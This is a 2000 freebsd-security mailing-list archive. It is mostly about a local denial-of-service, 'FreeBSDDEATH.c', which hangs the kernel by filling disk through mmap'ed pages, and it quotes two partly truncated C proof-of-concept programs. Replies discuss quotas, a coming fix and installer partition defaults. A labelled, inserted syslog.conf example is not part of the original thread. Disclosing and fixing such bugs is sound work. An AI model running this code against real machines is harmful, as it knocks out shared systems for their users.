To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Jun 2 9: 8:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [216.240.41.2]) by hub.freebsd.org (Postfix) with ESMTP id 8485637B76F for ; Fri, 2 Jun 2000 09:08:29 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id JAA47864; Fri, 2 Jun 2000 09:08:22 -0700 (PDT) (envelope-from dillon) Date: Fri, 2 Jun 2000 09:08:22 -0700 (PDT) From: Matthew Dillon Message-Id: <200006021608.JAA47864@apollo.backplane.com> To: Mike Tancsa Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSDDEATH.c.txt (mmap dirty page no check bug) References:
<3.0.5.32.20000602093923.0309ed60@marble.sentex.ca> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

:>This seems to be doing the rounds with the script kiddies fairly quickly.
:>I've attached it.
:>(originally found at: http://ls.si.ru/tmp/FreeBSDDEATH.c.txt - dumped
:>by some skr1pt k1dd1es on irc)

If you go back one day Oleg posted the same snippet. It is possible to lock up a machine with this code, but the program isn't going to be very effective on any machine with public shell accounts if that machine has quotas enabled.

I put quotas on every partition users had access to at BEST, including /tmp (100MB quota). In fact, /tmp turned out to be the single most important partition to put a quota on due to the sheer number of programs that just assumed it would never fill up (and the sheer number of bozo users who would use /tmp to unpack warez and never delete any of it).

I should be able to get a fix in this weekend.

-Matt

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Jun 2 9: 9:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from scientia.demon.co.uk (scientia.demon.co.uk [212.228.14.13]) by hub.freebsd.org (Postfix) with ESMTP id 3581D37BFFC for ; Fri, 2 Jun 2000 09:09:40 -0700 (PDT) (envelope-from ben@scientia.demon.co.uk) Received: from strontium.scientia.demon.co.uk ([192.168.91.36] ident=exim) by scientia.demon.co.uk with esmtp (Exim 3.12 #1) id 12xrLU-0005Vz-00; Fri, 02 Jun 2000 14:18:40 +0100 Received: (from ben) by strontium.scientia.demon.co.uk (Exim 3.12 #7) id 12xrLT-0002K4-00; Fri, 02 Jun 2000 14:18:39 +0100 Date: Fri, 2 Jun 2000 14:18:39 +0100 From: Ben Smithurst To: User Datagram Protocol Cc: freebsd-security@freebsd.org Subject: Re: FreeBSDDEATH.c.txt (mmap dirty page no check bug) Message-ID: <20000602141839.G99925@strontium.scientia.demon.co.uk> References: <20000602140906.I70438@closed-networks.com>
Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20000602140906.I70438@closed-networks.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org User Datagram Protocol wrote: > Apologies if this issue was posted to any other lists, but it came my way, > I am not currently on bugtraq due to some mail issues, and it looks like > something we should be aware of (albeit really a quality of implementation > issue that gets hit during times of high load - like something else I have > in the pipeline. Heh.) This was posted on freebsd-hackers, it looks like the code below was taken verbatim from there. Matt Dillon said he'll look at it this weekend. Not long now... I haven't seen it on Bugtraq, though I may have missed it. -- Ben Smithurst / ben@scientia.demon.co.uk / PGP: 0x99392F7D To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 2 12: 4:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from ewey.excite.com (ewey-rwcmta.excite.com [198.3.99.191]) by hub.freebsd.org (Postfix) with ESMTP id DF23937BB44 for ; Fri, 2 Jun 2000 12:04:50 -0700 (PDT) (envelope-from sergiovf@excite.com) Received: from knuckles.excite.com ([199.172.148.179]) by ewey.excite.com (InterMail vM.4.01.02.39 201-229-119-122) with ESMTP id <20000602190450.CNBL28401.ewey.excite.com@knuckles.excite.com> for ; Fri, 2 Jun 2000 12:04:50 -0700 Message-ID: <21786238.959972690834.JavaMail.imail@knuckles.excite.com> Date: Fri, 2 Jun 2000 12:04:50 -0700 (PDT) From: Sergio Valdes-Flores To: freebsd-security@freebsd.org Subject: Re: FreeBSDDEATH.c.txt (mmap dirty page no check bug) Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Mailer: Excite Inbox X-Sender-Ip: 216.242.60.82 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 
http://ls.si.ru/tmp/FreeBSDDEATH-2.c (dash not dot)

this is the page:
-----------------

/*
From:

Create 1GB file, fill it with 1s. The kernel (may|will) hang.
*/

int main(int argc,char **argv)
{
    int pages=256*1024;
    char *p;
    int fd,i;
    char filename[]="./junk.XXXXXXXX";

    fd=mkstemp(filename);
    ftruncate(fd,pages*4096);

    p=(char*)mmap(NULL,pages*4096,PROT_READ|PROT_WRITE,MAP_SHARED|MAP_NOSYNC,fd,0);
    for (i=0;i

> Yo,
>
> This seems to be doing the rounds with the script kiddies fairly quickly.
> I've attached it.
> (originally found at: http://ls.si.ru/tmp/FreeBSDDEATH.c.txt - dumped
> by some skr1pt k1dd1es on irc)
>
> vnode_pager_putpages() only does this check against the return value of
> VOP_PUTPAGES():
> rtval = VOP_PUTPAGES(vp, m, bytes, sync, rtvals, 0);
> if (rtval == EOPNOTSUPP) {
>
> And vnode_pager_generic_putpages() appears to force the return value for
> all page writes that it does to VM_PAGER_OK even when an error occurs in
> VOP_WRITE().
>
> The above is based on a quick inspection of the 4.0-STABLE fork source tree.
> So, this guy has a point.
>
> Apologies if this issue was posted to any other lists, but it came my way,
> I am not currently on bugtraq due to some mail issues, and it looks like
> something we should be aware of (albeit really a quality of implementation
> issue that gets hit during times of high load - like something else I have
> in the pipeline. Heh.)
>
> Regards
> --
> Bruce M. Simpson aka 'udp' Security Analyst & UNIX Development Engineer
> WWW: www.closed-networks.com/~udp
> Dundee www.packetfactory.net/~udp
> United Kingdom email: udp@closed-networks.com

> /*
> From: Oleg Derevenetz
> Date: Wed, 31 May 2000 19:04:12 +0400
> Subject: mmap
> Message-ID: <959790285@p4.f3.n5025.z2.ftn>
>
> Draft English translation: in vnode_pager.c there is no check for
> errors on write of dirty mmap'ed pages to disk.
> If there is not enough
> space or any other I/O error occurs, the results will be very bad.
>
> It will be good to kill the calling process, but it's hard to find out
> the owner of the offending page.
>
> The thing is that vnode_pager.c provides no error handling at all when
> dirty mmap'ed file pages are flushed to disk and there is not enough
> space on the disk for the flush (or, really, on any I/O error), and this
> leads to very bad results. About six months ago I corresponded with
> people from freebsd.hackers; by and large they just brushed me off. The
> VM is built crookedly enough that I have not yet managed to come up with
> a response to this problem. It would be desirable to kill the process,
> but extracting information about which process owns the page whose flush
> failed is quite difficult. So here I sit, racking my brains over what to
> do...
>
> By the way, is anyone here working on the kernel VM?
> */
>
> #include
> #include
> #include
> #include
> #include
> #include
>
> #define COUNT 1024*1024
> #define SIZE 10*1024*1024
>
> int main () {
>     int i,j,fd;
>     char *fptr, fname [16];
>
>     for (i=0;i
>         sprintf (fname, "%d", i);
>         printf ("DEBUG: fname: %s\n", fname); fflush (stdout);
>
>         fd=open (fname, O_RDWR|O_CREAT, 644);
>         lseek (fd, SIZE, SEEK_SET);
>         write (fd, "-", 1);
>         printf ("DEBUG: write\n"); fflush (stdout);
>
>         if ((fptr=mmap (NULL, SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd,
>             0))==MAP_FAILED) {
>             printf ("mmap() failed !\n"); fflush (stdout);
>             return 0;
>         }
>         printf ("DEBUG: mmap, errno=%d\n", errno); fflush (stdout);
>
>         for (j=0;j
>             fptr[j]='o';
>         printf ("DEBUG: fill\n"); fflush (stdout);
>     }
>
>     return 0;
> }

_______________________________________________________
Get 100% FREE Internet Access powered by Excite
Visit http://freelane.excite.com/freeisp

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Jun 2 12:29:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 72B5537BE03 for ; Fri, 2 Jun 2000 12:29:09 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id NAA14770; Fri, 2 Jun 2000 13:28:47 -0600 (MDT) Message-Id: <4.3.2.7.2.20000602132507.00b2bbc0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Fri, 02 Jun 2000 13:26:57 -0600 To: Matthew Dillon , Mike Tancsa From: Brett Glass Subject: Re: FreeBSDDEATH.c.txt (mmap dirty page no check bug) Cc: freebsd-security@FreeBSD.ORG In-Reply-To:
<200006021608.JAA47864@apollo.backplane.com> References: <3.0.5.32.20000602093923.0309ed60@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

At 10:08 AM 6/2/2000, Matthew Dillon wrote:

> I put quotas on every partition users had access to at BEST, including
> /tmp (100MB quota). In fact, /tmp turned out to be the single most
> important partition to put a quota on due to the sheer number of
> programs that just assumed it would never fill up (and the sheer number
> of bozo users who would use /tmp to unpack warez and never delete any
> of it).

An interesting related point: By default, the current sysinstall doesn't create a separate /tmp. It leaves /tmp as a directory in the rather small root partition. An action as simple as downloading a large file via Lynx (which downloads to /tmp and then moves files to a destination) is enough to overflow the root partition.

Has thought been given to changing this? If not, perhaps it should be submitted as a PR.
--Brett

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Jun 2 13:50:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id AE8D937B6E6 for ; Fri, 2 Jun 2000 13:50:14 -0700 (PDT) (envelope-from matt@ARPA.MAIL.NET) Received: (qmail 10662 invoked by uid 1000); 2 Jun 2000 20:50:12 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 2 Jun 2000 20:50:12 -0000 Date: Fri, 2 Jun 2000 16:50:09 -0400 (EDT) From: Matt Heckaman X-Sender: matt@epsilon.lucida.qc.ca To: Brett Glass Cc: Matthew Dillon , Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSDDEATH.c.txt (mmap dirty page no check bug) In-Reply-To: <4.3.2.7.2.20000602132507.00b2bbc0@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Fri, 2 Jun 2000, Brett Glass wrote:

[...]
: An interesting related point: By default, the current sysinstall doesn't
: create a separate /tmp. It leaves /tmp as a directory in the rather small
: root partition. An action as simple as downloading a large file via Lynx
: (which downloads to /tmp and then moves files to a destination) is
: enough to overflow the root partition.

I would like to see a system where it chooses defaults based on two classes, we'll call them "workstation" and "server" for the purpose of this discussion. The defaults now are fairly decent for a workstation with the addition of /tmp mentioned herein. However, I've seen a lot of people new to FreeBSD get bit HARD by those defaults, especially in any system that delivers e-mail to /var/mail. The default for /var is horribly low, I never did understand that myself.
It would be nice to say "are you a server or workstation" and then spit out some better default variables based on the answer.

: Has thought been given to changing this? If not, perhaps it should be
: submitted as a PR.

Not a bad idea at all.

: --Brett

Matt Heckaman
matt@arpa.mail.net
http://www.lucida.qc.ca

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (FreeBSD)
Comment: http://www.lucida.qc.ca/pgp

iD8DBQE5OB4EdMMtMcA1U5ARAsYXAJ9X/IhwU5jmlwnOF5DjbemEb3qEmwCcCokq
I7DlStGUalEC/VbXmH18jy4=
=vGaf
-----END PGP SIGNATURE-----

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Jun 2 13:58:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from moek.pir.net (moek.pir.net [209.192.237.190]) by hub.freebsd.org (Postfix) with ESMTP id 80E2B37B520 for ; Fri, 2 Jun 2000 13:58:47 -0700 (PDT) (envelope-from pir@pir.net) Received: from pir by moek.pir.net with local (Exim) id 12xyWf-0004Cf-00 for freebsd-security@FreeBSD.ORG; Fri, 02 Jun 2000 16:58:41 -0400 Date: Fri, 2 Jun 2000 16:58:40 -0400 From: Peter Radcliffe To: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSDDEATH.c.txt (mmap dirty page no check bug) Message-ID: <20000602165840.I3641@pir.net> Reply-To: freebsd-security@freebsd.org Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <4.3.2.7.2.20000602132507.00b2bbc0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: ; from matt@ARPA.MAIL.NET on Fri, Jun 02, 2000 at 04:50:09PM -0400 X-fish: < X-Copy-On-Listmail: Please do NOT Cc: me on list mail. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Matt Heckaman probably said:
> However, I've seen a lot of people new to FreeBSD get bit HARD by those
> defaults, especially in any system that delivers e-mail to /var/mail. The
> default for /var is horribly low, I never did understand that myself.
> It would be nice to say "are you a server or workstation" and then spit out
> some better default variables based on the answer.

It's not unreasonable to expect, in my opinion, that someone who is installing a "server" knows enough to change the defaults.

I've never used the default layouts.

P.

--
pir pir@pir.net pir@net.tufts.edu

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Jun 2 15:42:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from reddog.yi.org (ls-tc01-13.nothinbut.net [207.44.35.27]) by hub.freebsd.org (Postfix) with ESMTP id ACC9837C06C for ; Fri, 2 Jun 2000 15:42:33 -0700 (PDT) (envelope-from ai32@drexel.edu) Received: from reddog.yi.org (localhost [127.0.0.1]) by reddog.yi.org (Postfix) with SMTP id 2879257C; Fri, 2 Jun 2000 18:43:32 -0500 (EST) From: specter To: Fernando Schapachnik Subject: Re: gnapster dos(?) Date: Fri, 2 Jun 2000 18:39:45 -0500 X-Mailer: Unknown Abusive Thing Content-Type: text/plain Cc: freebsd-security@FreeBSD.ORG References: <200006021152.IAA24368@ns1.via-net-works.net.ar> In-Reply-To: <200006021152.IAA24368@ns1.via-net-works.net.ar> MIME-Version: 1.0 Message-Id: <00060218433200.01590@reddog.yi.org> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Fri, 02 Jun 2000, Fernando Schapachnik wrote:
> If I'm not wrong this was published in bugtraq a while ago...
>
> Regards!
[...]

If you are referring to FreeBSD-SA-00:18, that's a different thing. The issue there was that anyone could read any file (with the UID of the person running gnapster) on the system. This is a DoS, it crashes gnapster.

P.S.
The vulnerability you are referring to was fixed in 1.3.9

From owner-freebsd-security Fri Jun 2 21:14:38 2000
From: "jason schwab"
To: freebsd-security@freebsd.org, petef@databits.net, ghandi@mindless.com, amb78@nmia.com, nmlug@swcp.com
Date: Fri, 02 Jun 2000 23:14:31 EST
Subject: Syslog question...
Message-ID: <20000603041431.2547.qmail@hotmail.com>

Heya everyone;

I am going to have two public machines, and one machine that will do nothing except be a backup of syslog from both the public machines. On the syslog backup machine, is there any way to have different files for the logs coming from the different hosts? I don't want all the logs from both machines going into the same files on the logging backup machine....

Any ideas? Thanks...
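One way to do this on a FreeBSD log host is the per-host selector syntax of syslog.conf(5), where a line of the form `+hostname` makes the rules that follow it apply only to messages received from that host. This is an added example, not part of the original thread; the host names and log paths are placeholders.

```conf
# /etc/syslog.conf on the central log host (constructed example)
#
# syslogd only accepts remote messages from hosts named with -a, so in
# /etc/rc.conf on the log host (placeholder host names):
#   syslogd_flags="-a public1.example.net -a public2.example.net"
# Syslog over UDP carries no authentication, so -a is the only source
# check you get; keep the log host off the public network if you can.

# Rules for the log host itself: "@" is syslogd's name for the local host,
# so nothing received from the network matches this section.
+@
*.notice;authpriv.none;kern.debug;lpr.info;mail.crit;news.err  /var/log/messages
security.*                                  /var/log/security
auth.info;authpriv.info                     /var/log/auth.log

# Everything that arrives from the first public machine goes to its own
# files (separate auth log so logins are easy to review per host).
+public1.example.net
*.*                                         /var/log/hosts/public1/all.log
auth.info;authpriv.info                     /var/log/hosts/public1/auth.log

# Same for the second public machine.
+public2.example.net
*.*                                         /var/log/hosts/public2/all.log
auth.info;authpriv.info                     /var/log/hosts/public2/auth.log

# Reset the host selection so any later rules apply to all hosts again.
+*
```

syslogd does not create log files, so create the per-host directories and files (touch them) before restarting syslogd, and add them to /etc/newsyslog.conf so they get rotated.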
From owner-freebsd-security Sat Jun 3 2:36:13 2000
From: Narvi
To: freebsd-security@FreeBSD.ORG
Date: Sat, 3 Jun 2000 11:35:20 +0200 (EET)
Subject: Re: FreeBSDDEATH.c.txt (mmap dirty page no check bug)
In-Reply-To: <20000602165840.I3641@pir.net>

On Fri, 2 Jun 2000, Peter Radcliffe wrote:

> Matt Heckaman probably said:
> > However, I've seen a lot of people new to FreeBSD get bit HARD by those
> > defaults especially in any system that delivers e-mail to /var/mail. The
> > default for /var is horribly low, I never did understand that myself. It
> > would be nice to say "are you a server or workstation" and then spit out
> > some better default variables based on the answer.
>
> It's not unreasonable to expect, in my opinion, that someone who is
> installing a "server" know enough to change the defaults.
>
> I've never used the default layouts.

Which is way too much to assume.

>
> P.
>
> --
> pir pir@pir.net pir@net.tufts.edu

From owner-freebsd-security Sat Jun 3 11:24:32 2000
From: Wes Peters
Organization: Softweyr LLC
To: Matt Heckaman
Cc: Brett Glass, freebsd-security@FreeBSD.ORG
Date: Sat, 03 Jun 2000 12:27:58 -0600
Subject: Re: FreeBSDDEATH.c.txt (mmap dirty page no check bug)
Message-ID: <39394E2E.3706C561@softweyr.com>

Matt Heckaman wrote:
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Fri, 2 Jun 2000, Brett Glass wrote:
> [...]
> : An interesting related point: By default, the current sysinstall doesn't
> : create a separate /tmp. It leaves /tmp as a directory in the rather small
> : root partition. An action as simple as downloading a large file via Lynx
> : (which downloads to /tmp and then moves files to a destination) is
> : enough to overflow the root partition.
>
> I would like to see a system where it chooses defaults based on two
> classes, we'll call them "workstation" and "server" for the purpose of
> this discussion.
> The defaults now are fairly decent for a workstation with
> the addition of /tmp mentioned herein.
>
> However, I've seen a lot of people new to FreeBSD get bit HARD by those
> defaults especially in any system that delivers e-mail to /var/mail. The
> default for /var is horribly low, I never did understand that myself. It
> would be nice to say "are you a server or workstation" and then spit out
> some better default variables based on the answer.

Actually the defaults are ridiculous in the days of 6GB disks being hard to find. I use 128MB root and var partitions on small laptops.

I do think it would be of value to ask quite early in the installation if this is intended to be a workstation or server configuration and suggest different defaults for such things throughout the install.

As always, we await your patches. ;^)

-- 
"Where am I, and what am I doing in this handbasket?"

Wes Peters                                        Softweyr LLC
wes@softweyr.com                              http://softweyr.com/